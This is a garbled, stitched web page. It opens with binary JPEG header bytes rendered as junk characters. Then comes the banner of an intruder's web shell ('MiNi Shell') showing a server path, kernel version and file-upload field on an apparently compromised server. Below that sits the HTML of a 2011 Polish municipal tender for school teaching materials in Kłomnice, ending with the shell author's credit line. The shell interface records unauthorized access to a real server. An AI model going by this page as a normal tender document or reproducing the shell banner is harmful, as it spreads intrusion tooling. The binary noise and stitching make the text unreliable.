JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111020/344806-N-2011.html

<p class="kh_header"><b>Kłomnice: Zakup wraz z dostawą materiałów dydaktycznych i pomocowych do realizacji zajęć dodatkowych w szkołach podstawowych na terenie Gminy Kłomnice w ramach projektu  > Równy start - szansą na lepsze jutro < współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 344806 - 2011; data zamieszczenia: 20.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół w gminie Kłomnice , ul. Strażacka 20, 42-270 Kłomnice, woj. śląskie, tel. 34 366 84 09, faks 34 366 84 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.klomnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą materiałów dydaktycznych i pomocowych do realizacji zajęć dodatkowych w szkołach podstawowych na terenie Gminy Kłomnice w ramach projektu  > Równy start - szansą na lepsze jutro < współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest zakup wraz z dostawą materiałów dydaktycznych i pomocowych do realizacji zajęć dodatkowych w szkołach podstawowych na terenie Gminy Kłomnice w ramach projektu > Równy start - szansą na lepsze jutro < współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

2)Szczegółowy opis przedmiotu zamówienia poszczególnych części zamówienia zawiera Załącznik nr 1 do SIWZ 

3) Przedmiot zamówienia obejmuje następujące części:

I część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ DLA DZIECI ZE SPECYFICZNYMI TRUDNOŚCIAMI W CZYTANIU I PISANIU.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Rzerzęczycach
c)	Szkoła Podstawowa w Garnku
d)	Szkoła Podstawowa w Witkowicach
e)	Szkoła Podstawowa w Zawadzie
f)	Szkoła Podstawowa w Skrzydlowie
g)	Szkoła Podstawowa w Konarach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w  załączniku nr 1 do SIWZ - część I. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

II część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ DLA DZIECI Z TRUDNOŚCIAMI W ZDOBYWANIU UMIEJĘTNOŚCI MATEMATYCZNYCH.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Rzerzęczycach
c)	Szkoła Podstawowa w Garnku
d)	Szkoła Podstawowa w Witkowicach
e)	Szkoła Podstawowa w Skrzydlowie
f)	Szkoła Podstawowa w Konarach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w  załączniku nr 1 do SIWZ - część II. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy. 

III część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ LOGOPEDYCZNYCH.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć logopedycznych w następujących szkołach:
a)	Szkoła Podstawowa w Witkowicach
b)	Szkoła Podstawowa w Zawadzie
c)	Szkoła Podstawowa w Skrzydlowie
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część III. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

IV część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ Z GIMNASTYKI KOREKCYJNEJ DLA DZIECI Z WADAMI POSTAWY.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w następujących szkołach:
a)	Szkoła Podstawowa w Rzerzęczycach
b)	Szkoła Podstawowa w Garnku
c)	Szkoła Podstawowa w Witkowicach
d)	Szkoła Podstawowa w Zawadzie
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część IV. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

V część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ ROZWIJAJĄCYCH ZAINTERESOWANIA SZCZEGÓLNIE UZDOLNIONYCH MATEMATYCZNO - PRZYRODNICZO.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć rozwijających zainteresowania szczególnie uzdolnionych matematyczno-przyrodniczo w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Garnku
c)	Szkoła Podstawowa w Witkowicach
d)	Szkoła Podstawowa w Zawadzie
e)	Szkoła Podstawowa w Konarach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część V. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

VI część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ ROZWIJAJĄCYCH ZAINTERESOWANIA SZCZEGÓLNIE UZDOLNIONYCH PLASTYCZNIE.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Rzerzęczycach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część VI. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy. 

VII część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ ROZWIJAJĄCYCH ZAINTERESOWANIA SZCZEGÓLNIE UZDOLNIONYCH TEATRALNIE .
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Rzerzęczycach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część VII. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

VIII część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ ROZWIJAJĄCYCH ZAINTERESOWANIA SZCZEGÓLNIE UZDOLNIONYCH SPORTOWO.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w następujących szkołach:
a)	Szkoła Podstawowa w Konarach
b)	Szkoła Podstawowa w Rzerzęczycach
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część VIII. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy.

IX część - ZAKUP I DOSTAWA MATERIAŁÓW DYDAKTYCZNYCH I POMOCOWYCH DO REALIZACJI ZAJĘĆ ROZWIJAJĄCYCH ZAINTERESOWANIA SZCZEGÓLNIE UZDOLNIONYCH MUZYCZNO - TANECZNIE ORAZ DO REALIZACJI ZAJĘĆ Z MUZYKOTERAPII.
1. Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów dydaktycznych i pomocowych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w następujących szkołach:
a)	Szkoła Podstawowa w Kłomnicach
b)	Szkoła Podstawowa w Skrzydlowie
2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są w załączniku nr 1 do SIWZ - część IX. 
3.  Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.20.00-5, 39.16.21.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnianiu warunków art. 22 ust. 1 będzie wynikało, że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnianiu warunków art. 22 ust. 1 będzie wynikało, że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnianiu warunków art. 22 ust. 1 będzie wynikało, że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnianiu warunków art. 22 ust. 1 będzie wynikało, że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnianiu warunków art. 22 ust. 1 będzie wynikało, że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru - załącznik nr 2 do SIWZ wraz z wypełnionym szczegółowym opisem przedmiotu zamówienia, stanowiącym załącznik nr 1 do SIWZ.
2.	Oświadczenia o nie podleganiu wykluczeniu z postępowania, o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ
3.	Oświadczenie o niezaleganiu w opłacaniu składek ZUS i podatków  - załącznik nr 4 do SIWZ
4.	Oświadczenie o braku podstaw do wykluczenia, tj. iż nie podlega wykluczeniu
 z postępowania o udzielenie zamówienia w myśl art. 24 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych 
Zamawiający  przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W szczególności Zamawiający dopuszcza: 
a)	aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę   adresu siedziby, zmianę formy prawnej itp.,
b)	zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub  Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod  warunkiem, że takiej zgody udzieli instytucja dofinansowująca i, że Zamawiający nie straci dofinansowania  
c)	jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu zamówienia, 
d)	ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.klomnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno - Administracyjny Szkół w gminie Kłomnice, ul. Strażacka 20, 42-270 Kłomnice, pokój 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 10:00, miejsce: Zespół Ekonomiczno - Administracyjny Szkół w gminie Kłomnice, ul. Strażacka 20, 42-270 Kłomnice, pokój 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2. Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com